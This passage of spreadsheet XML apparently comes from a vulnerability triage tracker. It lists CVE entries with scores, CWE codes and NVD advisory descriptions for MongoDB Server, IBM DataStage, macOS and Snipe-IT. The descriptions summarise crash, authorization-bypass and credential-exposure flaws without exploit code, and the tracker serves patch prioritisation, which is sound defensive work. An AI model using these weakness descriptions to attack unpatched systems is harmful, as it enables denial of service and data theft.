        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73468</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B742" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80380</t>
        </is>
      </c>
      <c r="D742" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E742" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F742" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G742" s="5" t="inlineStr"/>
      <c r="H742" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I742" s="5" t="inlineStr"/>
      <c r="J742" s="5" t="inlineStr"/>
      <c r="K742" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L742" s="5" t="inlineStr"/>
      <c r="M742" s="5" t="inlineStr"/>
      <c r="N742" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O742" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P742" s="5" t="inlineStr"/>
      <c r="Q742" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R742" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote attacker to perform unauthorized actions due to cross-site request forgery.</t>
        </is>
      </c>
      <c r="S742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80380</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B743" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82052</t>
        </is>
      </c>
      <c r="D743" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E743" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F743" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G743" s="5" t="inlineStr"/>
      <c r="H743" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I743" s="5" t="inlineStr"/>
      <c r="J743" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K743" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L743" s="5" t="inlineStr"/>
      <c r="M743" s="5" t="inlineStr"/>
      <c r="N743" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O743" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P743" s="5" t="inlineStr"/>
      <c r="Q743" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R743" s="5" t="inlineStr">
        <is>
          <t>The $regexFindAll expression can be used by an authenticated user who can run aggregation pipeline stages to crash a MongoDB server (mongod). Under certain specific conditions the  regex match can start in the middle of a multi-code-unit character, triggering an assertion during query execution.</t>
        </is>
      </c>
      <c r="S743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B744" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82054</t>
        </is>
      </c>
      <c r="D744" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E744" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F744" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G744" s="5" t="inlineStr"/>
      <c r="H744" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I744" s="5" t="inlineStr"/>
      <c r="J744" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K744" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L744" s="5" t="inlineStr"/>
      <c r="M744" s="5" t="inlineStr"/>
      <c r="N744" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O744" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P744" s="5" t="inlineStr"/>
      <c r="Q744" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R744" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB server's JSON Pointer parser used during $jsonSchema query filter processing. When a find command includes a specially crafted $jsonSchema filter field, the parser processes the input without enforcing adequate limits on iteration count or total allocation size, resulting in significant memory amplification. Under concurrent request load, the cumulative memory consumption can exhaust available heap memory, causing the server's out-of-memory handler to terminate the mongod process and deny service to all connected clients.</t>
        </is>
      </c>
      <c r="S744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B745" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82055</t>
        </is>
      </c>
      <c r="D745" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E745" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F745" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G745" s="5" t="inlineStr"/>
      <c r="H745" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I745" s="5" t="inlineStr"/>
      <c r="J745" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K745" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L745" s="5" t="inlineStr"/>
      <c r="M745" s="5" t="inlineStr"/>
      <c r="N745" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O745" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P745" s="5" t="inlineStr"/>
      <c r="Q745" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R745" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB's 2dsphere index key generation that can cause a server crash due to a null pointer dereference. When a specially crafted GeoJSON document is inserted into a collection with a 2dsphere index, an inconsistency in geometry parsing can leave an internal object in an invalid, partially initialized state. During subsequent index key generation, access to this improperly initialized object results in a null pointer dereference that terminates the mongod process. An authenticated user with write access can use this to cause a denial of service.</t>
        </is>
      </c>
      <c r="S745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B746" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82057</t>
        </is>
      </c>
      <c r="D746" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E746" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F746" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G746" s="5" t="inlineStr"/>
      <c r="H746" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I746" s="5" t="inlineStr"/>
      <c r="J746" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K746" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L746" s="5" t="inlineStr"/>
      <c r="M746" s="5" t="inlineStr"/>
      <c r="N746" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O746" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P746" s="5" t="inlineStr"/>
      <c r="Q746" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R746" s="5" t="inlineStr">
        <is>
          <t>A security issue was discovered in MongoDB where an authenticated user with readWrite privileges could crash the mongod server process. By specifying a custom WiredTiger storage configuration option with an incompatible value during collection creation, a user could cause a type confusion in the storage engine layer. When documents were subsequently read from the misconfigured collection, the resulting mismatch in expected data format led to corrupted memory interpretation and a server crash. The crafted collection configuration persists across restarts, requiring manual operator intervention to remediate.</t>
        </is>
      </c>
      <c r="S746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B747" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82058</t>
        </is>
      </c>
      <c r="D747" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E747" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F747" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G747" s="5" t="inlineStr"/>
      <c r="H747" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I747" s="5" t="inlineStr"/>
      <c r="J747" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K747" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L747" s="5" t="inlineStr"/>
      <c r="M747" s="5" t="inlineStr"/>
      <c r="N747" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O747" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P747" s="5" t="inlineStr"/>
      <c r="Q747" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R747" s="5" t="inlineStr">
        <is>
          <t>A flaw in MongoDB's JSON Schema validation error generation code allows an authenticated user with readWrite privileges to crash the mongod server. When a BSON document containing an array with a malformed numeric field name fails a $jsonSchema items type constraint, the error generation path performs unsafe numeric conversion on the user-controlled field name without proper exception handling, resulting in an uncaught exception that terminates the server process. This is possible because incoming wire protocol BSON validation does not enforce that array element field names are valid, in-range numeric indices.</t>
        </is>
      </c>
      <c r="S747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B748" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82065</t>
        </is>
      </c>
      <c r="D748" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E748" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F748" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G748" s="5" t="inlineStr"/>
      <c r="H748" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I748" s="5" t="inlineStr"/>
      <c r="J748" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K748" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L748" s="5" t="inlineStr"/>
      <c r="M748" s="5" t="inlineStr"/>
      <c r="N748" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O748" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P748" s="5" t="inlineStr"/>
      <c r="Q748" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R748" s="5" t="inlineStr">
        <is>
          <t>A security issue in the MongoDB Server's storage engine integration layer allows an authenticated user with collection creation privileges to cause a persistent denial of service. Insufficient validation of user-supplied storage configuration options permits values that, once persisted to durable metadata, trigger a fatal assertion failure when the metadata is subsequently read by diagnostic operations. The corrupted metadata persists across server restarts and is replicated to other cluster members, requiring manual operator intervention to restore service.</t>
        </is>
      </c>
      <c r="S748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B749" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82068</t>
        </is>
      </c>
      <c r="D749" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E749" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F749" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G749" s="5" t="inlineStr"/>
      <c r="H749" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I749" s="5" t="inlineStr"/>
      <c r="J749" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K749" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L749" s="5" t="inlineStr"/>
      <c r="M749" s="5" t="inlineStr"/>
      <c r="N749" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O749" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P749" s="5" t="inlineStr"/>
      <c r="Q749" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R749" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an authenticated user with write privileges to trigger a persistent fatal assertion crash by sending specially crafted retryable write commands. The crash state is durably persisted, causing the server process to repeatedly crash on restart and potentially propagating to additional nodes in a sharded cluster. Manual intervention is required to restore service availability.</t>
        </is>
      </c>
      <c r="S749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B750" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82070</t>
        </is>
      </c>
      <c r="D750" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E750" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F750" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G750" s="5" t="inlineStr"/>
      <c r="H750" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I750" s="5" t="inlineStr"/>
      <c r="J750" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K750" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L750" s="5" t="inlineStr"/>
      <c r="M750" s="5" t="inlineStr"/>
      <c r="N750" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O750" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P750" s="5" t="inlineStr"/>
      <c r="Q750" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R750" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server's diagnostic reporting interface allows an authenticated user with monitoring privileges to access insufficiently protected credentials from concurrent administrative operations. The same credentials are properly redacted in server log output, but the diagnostic interface omits equivalent redaction. Successful exploitation requires a valid authenticated session with monitoring-level permissions and results in exposure of cleartext credentials that could enable impersonation of other users, including privileged accounts.</t>
        </is>
      </c>
      <c r="S750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B751" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82073</t>
        </is>
      </c>
      <c r="D751" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E751" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F751" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G751" s="5" t="inlineStr"/>
      <c r="H751" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I751" s="5" t="inlineStr"/>
      <c r="J751" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K751" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L751" s="5" t="inlineStr"/>
      <c r="M751" s="5" t="inlineStr"/>
      <c r="N751" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O751" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P751" s="5" t="inlineStr"/>
      <c r="Q751" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R751" s="5" t="inlineStr">
        <is>
          <t>A security issue in the MongoDB Server aggregation framework allows an authenticated user with limited read privileges to bypass view-level authorization checks and access data from unauthorized collections when Atlas Search features are in use. The issue stems from insufficient validation of an internal command parameter that can be set by external clients, causing a security check to be improperly skipped.</t>
        </is>
      </c>
      <c r="S751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B752" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82074</t>
        </is>
      </c>
      <c r="D752" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E752" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F752" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G752" s="5" t="inlineStr"/>
      <c r="H752" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I752" s="5" t="inlineStr"/>
      <c r="J752" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K752" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L752" s="5" t="inlineStr"/>
      <c r="M752" s="5" t="inlineStr"/>
      <c r="N752" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O752" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P752" s="5" t="inlineStr"/>
      <c r="Q752" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R752" s="5" t="inlineStr">
        <is>
          <t>MongoDB Server contains an incorrect authorization vulnerability in the aggregation framework. An authenticated user with minimal privileges can craft a specially formatted aggregation request that causes the server's authorization subsystem to evaluate a different operation than what is actually executed, resulting in unauthorized read access to collection data within the target database.</t>
        </is>
      </c>
      <c r="S752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B753" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84548</t>
        </is>
      </c>
      <c r="D753" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E753" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F753" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G753" s="5" t="inlineStr"/>
      <c r="H753" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I753" s="5" t="inlineStr"/>
      <c r="J753" s="5" t="inlineStr"/>
      <c r="K753" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L753" s="5" t="inlineStr"/>
      <c r="M753" s="5" t="inlineStr"/>
      <c r="N753" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O753" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P753" s="5" t="inlineStr"/>
      <c r="Q753" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R753" s="5" t="inlineStr">
        <is>
          <t>An integer overflow was addressed with improved input validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Processing a maliciously crafted document may lead to an out-of-bounds read.</t>
        </is>
      </c>
      <c r="S753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84548</t>
        </is>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B754" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84565</t>
        </is>
      </c>
      <c r="D754" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E754" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F754" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G754" s="5" t="inlineStr"/>
      <c r="H754" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I754" s="5" t="inlineStr"/>
      <c r="J754" s="5" t="inlineStr"/>
      <c r="K754" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L754" s="5" t="inlineStr"/>
      <c r="M754" s="5" t="inlineStr"/>
      <c r="N754" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O754" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P754" s="5" t="inlineStr"/>
      <c r="Q754" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R754" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Processing a maliciously crafted disk image may lead to unexpected app termination.</t>
        </is>
      </c>
      <c r="S754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84565</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B755" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86757</t>
        </is>
      </c>
      <c r="D755" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E755" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F755" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G755" s="5" t="inlineStr"/>
      <c r="H755" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I755" s="5" t="inlineStr"/>
      <c r="J755" s="5" t="inlineStr"/>
      <c r="K755" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L755" s="5" t="inlineStr"/>
      <c r="M755" s="5" t="inlineStr"/>
      <c r="N755" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O755" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P755" s="5" t="inlineStr"/>
      <c r="Q755" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R755" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly gate access to encrypted custom-field values in asset form templates for listbox, textarea, markdown-textarea, and date/datetime picker elements. Authenticated users with assets.edit, assets.checkin, assets.checkout, or assets.audit permissions can read plaintext encrypted custom field values by opening asset forms, bypassing the assets.view.encrypted_custom_fields permission check.</t>
        </is>
      </c>
      <c r="S755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86757</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B756" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86758</t>
        </is>
      </c>
      <c r="D756" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E756" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F756" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G756" s="5" t="inlineStr"/>
      <c r="H756" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I756" s="5" t="inlineStr"/>
      <c r="J756" s="5" t="inlineStr"/>
      <c r="K756" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L756" s="5" t="inlineStr"/>
      <c r="M756" s="5" t="inlineStr"/>
      <c r="N756" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O756" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P756" s="5" t="inlineStr"/>
      <c r="Q756" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="R756" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly enforce the viewKeys authorization gate in CSV export and API index endpoints, allowing authenticated users with only licenses.view permission to access product keys. Attackers can download all license keys in bulk via CSV export or validate candidate keys through API response discrepancies without needing the viewKeys permission.</t>
        </is>
      </c>
      <c r="S756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86758</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B757" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86759</t>
        </is>
      </c>
      <c r="D757" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E757" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F757" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G757" s="5" t="inlineStr"/>
      <c r="H757" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I757" s="5" t="inlineStr"/>
      <c r="J757" s="5" t="inlineStr"/>
      <c r="K757" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L757" s="5" t="inlineStr"/>
      <c r="M757" s="5" t="inlineStr"/>
      <c r="N757" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O757" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P757" s="5" t="inlineStr"/>
      <c r="Q757" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R757" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to authorize the POST /hardware/history endpoint, allowing any authenticated user to reassign arbitrary assets and modify audit logs. Attackers can submit a CSV file to reassign assets across companies and inject fraudulent audit trail entries, compromising inventory integrity and accountability.</t>
        </is>
      </c>
      <c r="S757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86759</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
